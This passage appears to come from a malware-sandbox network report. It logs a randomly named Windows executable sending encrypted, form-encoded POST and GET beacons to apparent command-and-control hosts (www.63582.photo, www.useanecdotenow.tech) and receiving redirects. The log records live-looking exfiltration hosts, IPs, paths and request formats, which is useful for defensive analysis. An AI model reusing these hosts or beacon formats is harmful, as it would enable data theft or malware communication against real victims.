                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Fables"> <meta name="author" content="Enterprise Development"> <link rel="shortcut icon" href="assets/custom/images/shortcut.png"> <title> 404</title> ... animate.css--> <link href="assets/vendor/animate.css-master/animate.min.css" rel="stylesheet"> ... Load Screen --> <link href="assets/vendor/loadscreen/css/spinkit.css" rel="stylesheet"> ... GOOGLE FONT --> <link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i" rel="stylesheet"> ... Font Awesome 5 --> <link href="assets/vendor/fontawesome/css/fontawesome-all.min.css" rel="stylesheet"> ... Fables Icons --> <link href="assets/custom/css/fables-icons.css" rel="stylesheet"> ... Bootstrap CSS --> <link href="assets/vendor/bootstrap/css/boo [TRUNCATED]
                                                      Sep 11, 2024 11:18:29.322052956 CEST | 1236 | IN | Data Raw: 2f 62 6f 6f 74 73 74 72 61 70 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2d 34 2d 6e 61 76 62 61 72 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 41 4e 43 59 20 42 4f 58 20 2d 2d 3e 0a 20 20
                                                      Data Ascii: /bootstrap/css/bootstrap-4-navbar.css" rel="stylesheet"> ... FANCY BOX --> <link href="assets/vendor/fancybox-master/jquery.fancybox.min.css" rel="stylesheet"> ... OWL CAROUSEL --> <link href="assets/vendor/owlcarousel/owl.c
                                                      Sep 11, 2024 11:18:29.322088003 CEST | 1236 | IN | Data Raw: 73 70 61 72 65 6e 74 20 74 65 78 74 2d 77 68 69 74 65 22 3e 20 3c 69 20 63 6c 61 73 73 3d 22 66 61 73 20 66 61 2d 73 65 61 72 63 68 22 3e 3c 2f 69 3e 20 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76
                                                      Data Ascii: sparent text-white"> <i class="fas fa-search"></i> </button> </div> </div> </form> </div> </div>... Loading Screen --><div id="ju-loading-screen"> <div class="sk-double-bounce"> <div
                                                      Sep 11, 2024 11:18:29.322185040 CEST | 1236 | IN | Data Raw: 6c 61 73 73 3d 22 6d 72 2d 31 22 3e 20 45 6e 67 6c 69 73 68 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 20 77 68 69 74 65 2d 63 6f 6c
                                                      Data Ascii: lass="mr-1"> English</a> <a class="dropdown-item white-color font-13 fables-second-hover-color" href="#"> <img src="assets/custom/images/France.png" alt="england flag" class="mr-1"> French</a>
                                                      Sep 11, 2024 11:18:29.322218895 CEST | 896 | IN | Data Raw: 64 20 70 6c 2d 30 22 20 68 72 65 66 3d 22 69 6e 64 65 78 2e 68 74 6d 6c 22 3e 3c 69 6d 67 20 73 72 63 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 66 61 62 6c 65 73 2d 6c 6f 67 6f 2e 70 6e 67 22 20 61 6c 74 3d 22 46 61 62
                                                      Data Ascii: d pl-0" href="index.html"><img src="assets/custom/images/fables-logo.png" alt="Fables Template" class="fables-logo"></a> <button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#fablesNavDro
                                                      Sep 11, 2024 11:18:29.322294950 CEST | 1236 | IN | Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 48 6f 6d 65 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20
                                                      Data Ascii: Home </a> <ul class="dropdown-menu" aria-labelledby="sub-nav1"> <li><a class="dropdown-item" href=
                                                      Sep 11, 2024 11:18:29.322326899 CEST | 1236 | IN | Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 75 6c 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 6d 65 6e 75 22 3e 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                      Data Ascii: <ul class="dropdown-menu"> <li><a class="dropdown-item dropdown-toggle" href="#">Header 1</a> <ul class
                                                      Sep 11, 2024 11:18:29.322401047 CEST | 448 | IN | Data Raw: 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 64
                                                      Data Ascii: ></li> <li><a class="dropdown-item" href="header2-light.html">Header 2 Light</a></li> <li><a class="dropdown-item" href="he
                                                      Sep 11, 2024 11:18:29.322433949 CEST | 1236 | IN | Data Raw: 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 20 64 72 6f 70 64 6f 77 6e 2d 74 6f 67 67 6c 65 22 20 68 72 65 66 3d 22 23 22 3e 48 65 61 64 65 72 20 33 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20
                                                      Data Ascii: <li><a class="dropdown-item dropdown-toggle" href="#">Header 3</a> <ul class="dropdown-menu"> <li><a class="dropdown-ite
                                                      Sep 11, 2024 11:18:29.322508097 CEST | 224 | IN | Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 22 20 68 72 65 66 3d 22 68 65 61 64 65 72 34 2d 64 61 72 6b 2e 68 74 6d 6c 22 3e 48 65 61 64 65 72 20 34
                                                      Data Ascii: <li><a class="dropdown-item" href="header4-dark.html">Header 4 Dark</a></li> </ul> </li>
                                                      Sep 11, 2024 11:18:29.327617884 CEST | 1236 | IN | Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 20 64 72 6f 70 64 6f 77 6e 2d
                                                      Data Ascii: <li><a class="dropdown-item dropdown-toggle" href="#">Header 5</a> <ul class="dropdown-menu">


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      17 | 192.168.2.4 | 63333 | 147.92.40.175 | 80 | 3496 | C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Sep 11, 2024 11:18:35.220805883 CEST | 760 | OUT | POST /5o7d/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.63582.photo
                                                      Origin: http://www.63582.photo
                                                      Content-Length: 201
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Referer: http://www.63582.photo/5o7d/
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                      Data Raw: 70 50 5f 38 3d 2b 4f 32 78 66 51 56 4c 44 65 57 6a 5a 6b 34 65 2b 4d 76 58 6b 71 6c 63 54 2f 52 76 78 35 33 33 4e 69 4b 35 58 57 35 57 6e 52 38 45 4d 43 63 43 6c 61 6c 63 76 58 6f 62 2b 73 69 72 50 51 47 50 66 43 70 42 74 6f 46 50 54 42 6c 4b 54 62 73 6d 56 65 32 41 78 42 30 63 31 59 71 31 61 6e 79 6b 71 4b 32 37 70 33 61 76 32 2f 56 7a 55 73 58 64 77 75 5a 2b 58 70 38 71 4e 70 75 47 46 57 74 75 62 67 72 57 45 4e 6e 6d 7a 57 4d 63 61 73 4b 56 54 75 4b 4c 33 47 33 2f 39 6f 31 45 56 5a 59 5a 6e 47 50 65 64 46 44 50 7a 34 77 68 77 72 35 51 6a 70 42 41 52 4f 64 2b 49 39 5a 36 57 32 55 55 39 67 3d 3d
                                                      Data Ascii: pP_8=+O2xfQVLDeWjZk4e+MvXkqlcT/Rvx533NiK5XW5WnR8EMCcClalcvXob+sirPQGPfCpBtoFPTBlKTbsmVe2AxB0c1Yq1anykqK27p3av2/VzUsXdwuZ+Xp8qNpuGFWtubgrWENnmzWMcasKVTuKL3G3/9o1EVZYZnGPedFDPz4whwr5QjpBAROd+I9Z6W2UU9g==
                                                      Sep 11, 2024 11:18:36.080634117 CEST | 357 | IN | HTTP/1.1 301 Moved Permanently
                                                      Date: Wed, 11 Sep 2024 09:18:35 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 166
                                                      Connection: close
                                                      Location: https://www.63582.photo/5o7d/
                                                      Server: 8080
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      18 | 192.168.2.4 | 63334 | 147.92.40.175 | 80 | 3496 | C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Sep 11, 2024 11:18:37.765835047 CEST | 780 | OUT | POST /5o7d/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.63582.photo
                                                      Origin: http://www.63582.photo
                                                      Content-Length: 221
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Referer: http://www.63582.photo/5o7d/
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                      Data Raw: 70 50 5f 38 3d 2b 4f 32 78 66 51 56 4c 44 65 57 6a 59 45 6f 65 2f 72 44 58 73 71 6c 66 63 66 52 76 2f 70 33 7a 4e 69 4f 35 58 58 39 34 67 6b 4d 45 43 44 73 43 72 37 6c 63 71 58 6f 62 77 4d 69 75 42 77 47 49 66 43 56 7a 74 6f 4a 50 54 46 4e 4b 54 61 63 6d 57 70 43 44 78 52 30 65 36 34 71 33 56 48 79 6b 71 4b 32 37 70 30 6d 46 32 2f 4e 7a 55 64 48 64 78 4d 78 39 61 4a 38 70 64 35 75 47 4f 32 74 69 62 67 72 30 45 49 2f 41 7a 55 30 63 61 70 75 56 51 36 65 49 69 32 33 35 7a 49 31 4b 55 63 6c 54 69 6c 4b 58 44 30 48 76 73 59 45 6a 78 74 6f 4b 79 59 67 58 44 4f 35 4e 56 36 51 4f 62 31 70 64 6d 6d 2b 43 56 47 32 42 78 4b 6f 72 2b 62 76 4b 42 30 2b 51 31 77 59 3d
                                                      Data Ascii: pP_8=+O2xfQVLDeWjYEoe/rDXsqlfcfRv/p3zNiO5XX94gkMECDsCr7lcqXobwMiuBwGIfCVztoJPTFNKTacmWpCDxR0e64q3VHykqK27p0mF2/NzUdHdxMx9aJ8pd5uGO2tibgr0EI/AzU0capuVQ6eIi235zI1KUclTilKXD0HvsYEjxtoKyYgXDO5NV6QOb1pdmm+CVG2BxKor+bvKB0+Q1wY=
                                                      Sep 11, 2024 11:18:38.649354935 CEST | 357 | IN | HTTP/1.1 301 Moved Permanently
                                                      Date: Wed, 11 Sep 2024 09:18:38 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 166
                                                      Connection: close
                                                      Location: https://www.63582.photo/5o7d/
                                                      Server: 8080
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      19 | 192.168.2.4 | 63335 | 147.92.40.175 | 80 | 3496 | C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Sep 11, 2024 11:18:40.318083048 CEST | 10862 | OUT | POST /5o7d/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.63582.photo
                                                      Origin: http://www.63582.photo
                                                      Content-Length: 10301
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Referer: http://www.63582.photo/5o7d/
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                      Data Raw: 70 50 5f 38 3d 2b 4f 32 78 66 51 56 4c 44 65 57 6a 59 45 6f 65 2f 72 44 58 73 71 6c 66 63 66 52 76 2f 70 33 7a 4e 69 4f 35 58 58 39 34 67 6b 45 45 43 78 6b 43 72 59 4e 63 74 58 6f 62 75 63 69 76 42 77 47 5a 66 43 4d 36 74 6f 31 66 54 48 46 4b 54 34 55 6d 43 4e 65 44 2b 52 30 65 78 59 71 32 61 6e 7a 6b 71 4a 4f 6e 70 30 32 46 32 2f 4e 7a 55 65 50 64 32 65 5a 39 4a 35 38 71 4e 70 75 42 46 57 74 4f 62 6b 50 4f 45 4a 4c 50 7a 6e 38 63 5a 4a 2b 56 41 63 69 49 67 57 33 37 2b 6f 30 4d 55 63 68 51 69 6d 75 78 44 30 7a 4a 73 62 59 6a 78 4a 52 4a 72 4c 55 32 51 75 78 53 42 37 6f 79 55 57 52 4e 6e 32 65 74 54 55 32 63 73 65 31 48 38 35 2f 48 55 31 36 6b 69 48 62 7a 51 76 68 59 67 4e 46 55 51 58 63 65 58 50 38 39 63 53 68 52 45 6d 6d 33 37 36 66 41 70 51 2b 4b 79 71 49 48 37 72 4f 4c 6a 54 65 58 4e 6c 39 42 6f 57 6e 45 52 75 43 58 5a 71 70 6d 38 6b 62 57 2f 59 4e 71 65 57 70 70 48 55 43 32 7a 39 42 6d 44 33 62 49 49 55 79 59 4d 5a 34 78 77 7a 73 31 50 7a 71 70 59 45 79 76 76 4d 79 62 38 7a 68 72 42 63 39 39 47 [TRUNCATED]
                                                      Data Ascii: pP_8= [TRUNCATED]
                                                      Sep 11, 2024 11:18:40.343519926 CEST | 1236 | OUT | Data Raw: 6f 48 6b 66 70 4a 48 32 54 38 42 61 31 34 6a 58 31 37 4c 48 71 38 50 75 36 4b 33 44 47 30 72 4c 75 78 66 65 34 67 6b 4e 64 56 37 73 2b 6f 36 48 70 4f 74 38 44 6c 2f 50 63 4f 4a 66 45 30 77 73 63 4e 6f 4a 66 4c 64 6e 6f 4c 4a 79 78 30 49 41 51 2b
                                                      Data Ascii: oHkfpJH2T8Ba14jX17LHq8Pu6K3DG0rLuxfe4gkNdV7s+o6HpOt8Dl/PcOJfE0wscNoJfLdnoLJyx0IAQ+7p2GxiyI9fHMItpo/Jl1rGKwkf4uMpf5liim355O2p+HxxGoeSTCPI5YDH3ppsFfWW8ERznodaswKKTQy7p1nZFrkWLhjkTxZgKdCr+qvZXGgR9qQTKY6Bu8KqAnjMLXjUUjlZ7eq8n56W5Djjc67W9JximqoUDSs
                                                      Sep 11, 2024 11:18:41.205226898 CEST | 357 | IN | HTTP/1.1 301 Moved Permanently
                                                      Date: Wed, 11 Sep 2024 09:18:41 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 166
                                                      Connection: close
                                                      Location: https://www.63582.photo/5o7d/
                                                      Server: 8080
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      20 | 192.168.2.4 | 63336 | 147.92.40.175 | 80 | 3496 | C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Sep 11, 2024 11:18:42.857403994 CEST | 498 | OUT | GET /5o7d/?pP_8=zMeRclQqEZ6cHEksxL2258xeQPEFk6LXLXq5VQFXrGMOKBUumeR2nXgC5pr3HgG3QDdipY9Tb1BbXYBiFpGduAov/pmUDz/4soHslE7c+cNQZpL9+8t0WKA=&V0Qh=4pBta8 HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Host: www.63582.photo
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                       Timestamp: Sep 11, 2024 11:18:43.805891991 CEST | Bytes transferred: 495 | Direction: IN
                                                       Data: HTTP/1.1 301 Moved Permanently
                                                      Date: Wed, 11 Sep 2024 09:18:43 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 166
                                                      Connection: close
                                                      Location: https://www.63582.photo/5o7d/?pP_8=zMeRclQqEZ6cHEksxL2258xeQPEFk6LXLXq5VQFXrGMOKBUumeR2nXgC5pr3HgG3QDdipY9Tb1BbXYBiFpGduAov/pmUDz/4soHslE7c+cNQZpL9+8t0WKA=&V0Qh=4pBta8
                                                      Server: 8080
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                       Session ID: 21 | Source IP: 192.168.2.4 | Source Port: 63337 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 3496 | Process: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
                                                       Timestamp: Sep 11, 2024 11:18:48.849874020 CEST | Bytes transferred: 784 | Direction: OUT
                                                       Data: POST /68ac/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.useanecdotenow.tech
                                                      Origin: http://www.useanecdotenow.tech
                                                      Content-Length: 201
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Referer: http://www.useanecdotenow.tech/68ac/
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                      Data Raw: 70 50 5f 38 3d 5a 66 34 78 51 4c 74 58 62 38 68 4b 6d 64 67 6d 7a 6e 54 4f 65 66 4f 43 35 5a 36 30 4a 33 62 56 46 6e 64 58 34 38 42 72 61 49 6c 6d 6d 35 71 33 6d 67 78 76 57 59 45 7a 38 6b 37 36 62 68 6d 75 46 50 31 69 4a 2b 45 79 66 44 72 45 35 64 31 34 52 2f 45 2f 2f 48 2f 39 57 5a 65 79 71 49 52 2f 62 55 51 69 46 6a 77 6e 45 38 6d 34 34 6a 69 69 61 71 76 53 2f 2f 73 4f 75 72 58 4c 73 34 30 72 34 6a 37 78 59 46 77 6e 37 79 36 62 52 35 57 64 50 57 41 2f 55 43 78 4f 34 45 6f 42 33 69 50 6e 6c 38 62 58 38 6b 55 59 68 6a 48 79 66 72 33 6c 52 73 69 72 65 6a 54 56 73 64 4c 61 4c 78 48 44 46 67 3d 3d
                                                      Data Ascii: pP_8=Zf4xQLtXb8hKmdgmznTOefOC5Z60J3bVFndX48BraIlmm5q3mgxvWYEz8k76bhmuFP1iJ+EyfDrE5d14R/E//H/9WZeyqIR/bUQiFjwnE8m44jiiaqvS//sOurXLs40r4j7xYFwn7y6bR5WdPWA/UCxO4EoB3iPnl8bX8kUYhjHyfr3lRsirejTVsdLaLxHDFg==


                                                       Session ID: 22 | Source IP: 192.168.2.4 | Source Port: 63338 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 3496 | Process: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
                                                       Timestamp: Sep 11, 2024 11:18:51.389895916 CEST | Bytes transferred: 804 | Direction: OUT
                                                       Data: POST /68ac/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.useanecdotenow.tech
                                                      Origin: http://www.useanecdotenow.tech
                                                      Content-Length: 221
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Referer: http://www.useanecdotenow.tech/68ac/
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                      Data Raw: 70 50 5f 38 3d 5a 66 34 78 51 4c 74 58 62 38 68 4b 6e 35 63 6d 32 46 37 4f 57 66 4f 44 6c 70 36 30 41 58 62 4a 46 6d 68 58 34 39 45 6d 61 62 52 6d 6c 62 79 33 6e 68 78 76 62 34 45 7a 6b 30 37 37 59 52 6d 66 46 50 78 4d 4a 36 45 79 66 44 2f 45 35 5a 78 34 57 4d 73 38 38 33 2f 7a 62 35 65 30 33 59 52 2f 62 55 51 69 46 6a 6b 42 45 38 65 34 34 79 79 69 62 4f 37 64 68 76 73 42 2b 62 58 4c 39 49 30 76 34 6a 36 63 59 45 73 4e 37 78 4f 62 52 35 6d 64 50 46 59 34 61 79 77 46 31 6b 70 78 35 54 75 4e 76 73 6a 58 2b 6e 38 72 69 42 50 51 58 4e 6d 2f 41 64 44 38 4d 6a 33 6d 78 61 43 75 47 79 36 4b 65 6b 4e 41 73 54 45 52 58 52 63 39 4a 73 52 66 64 48 6f 4d 57 2f 4d 3d
                                                      Data Ascii: pP_8=Zf4xQLtXb8hKn5cm2F7OWfODlp60AXbJFmhX49EmabRmlby3nhxvb4Ezk077YRmfFPxMJ6EyfD/E5Zx4WMs883/zb5e03YR/bUQiFjkBE8e44yyibO7dhvsB+bXL9I0v4j6cYEsN7xObR5mdPFY4aywF1kpx5TuNvsjX+n8riBPQXNm/AdD8Mj3mxaCuGy6KekNAsTERXRc9JsRfdHoMW/M=


                                                       Session ID: 23 | Source IP: 192.168.2.4 | Source Port: 63339 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 3496 | Process: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
                                                       Timestamp: Sep 11, 2024 11:18:53.935519934 CEST | Bytes transferred: 10886 | Direction: OUT
                                                       Data: POST /68ac/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.useanecdotenow.tech
                                                      Origin: http://www.useanecdotenow.tech
                                                      Content-Length: 10301
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Referer: http://www.useanecdotenow.tech/68ac/
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                      Data Raw: 70 50 5f 38 3d 5a 66 34 78 51 4c 74 58 62 38 68 4b 6e 35 63 6d 32 46 37 4f 57 66 4f 44 6c 70 36 30 41 58 62 4a 46 6d 68 58 34 39 45 6d 61 61 70 6d 6c 75 75 33 6d 43 5a 76 61 34 45 7a 36 6b 37 6d 59 52 6d 34 46 50 4a 41 4a 36 42 4a 66 42 48 45 34 38 6c 34 54 39 73 38 6e 6e 2f 7a 48 4a 65 31 71 49 52 71 62 53 78 72 46 6a 30 42 45 38 65 34 34 78 36 69 62 61 76 64 6a 76 73 4f 75 72 58 35 73 34 30 48 34 67 4b 69 59 45 6f 33 36 43 57 62 51 5a 32 64 43 58 41 34 63 69 77 48 79 6b 70 70 35 54 69 57 76 73 2b 73 2b 6d 4a 6a 69 44 54 51 54 62 4c 6c 45 2f 4c 47 4f 79 50 33 71 6f 6d 4e 49 79 75 58 62 57 49 36 74 77 67 39 50 69 59 70 50 65 45 39 4f 30 6b 4a 41 37 75 54 51 6b 4d 4e 72 57 61 38 34 4e 5a 75 71 79 33 56 45 2f 63 30 52 74 66 37 4c 52 41 48 78 77 4b 47 76 4b 73 4f 62 31 45 32 57 52 4b 7a 69 5a 59 68 73 72 6b 7a 30 48 6e 66 51 7a 62 6d 39 44 41 79 2b 5a 64 63 6d 48 4a 67 4c 48 6f 57 67 39 4b 6e 74 79 32 